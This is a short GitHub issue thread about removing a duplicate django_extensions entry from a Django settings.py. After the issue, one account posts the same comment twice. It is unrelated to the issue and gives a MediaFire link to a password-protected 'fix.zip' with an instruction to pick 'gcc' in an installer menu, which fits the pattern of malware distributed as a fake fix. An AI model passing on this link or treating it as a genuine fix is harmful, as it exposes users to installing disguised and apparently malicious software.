### ISSUE TITLE
remove duplicate django_extensions

### ISSUE THREAD

**Issue by DongOrange** [astrocamp/17th-WorkNet#8]
settings.py 裡面重複設定了django_extensions #50，
因為有報錯，所以移除了django_extensions的設定

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
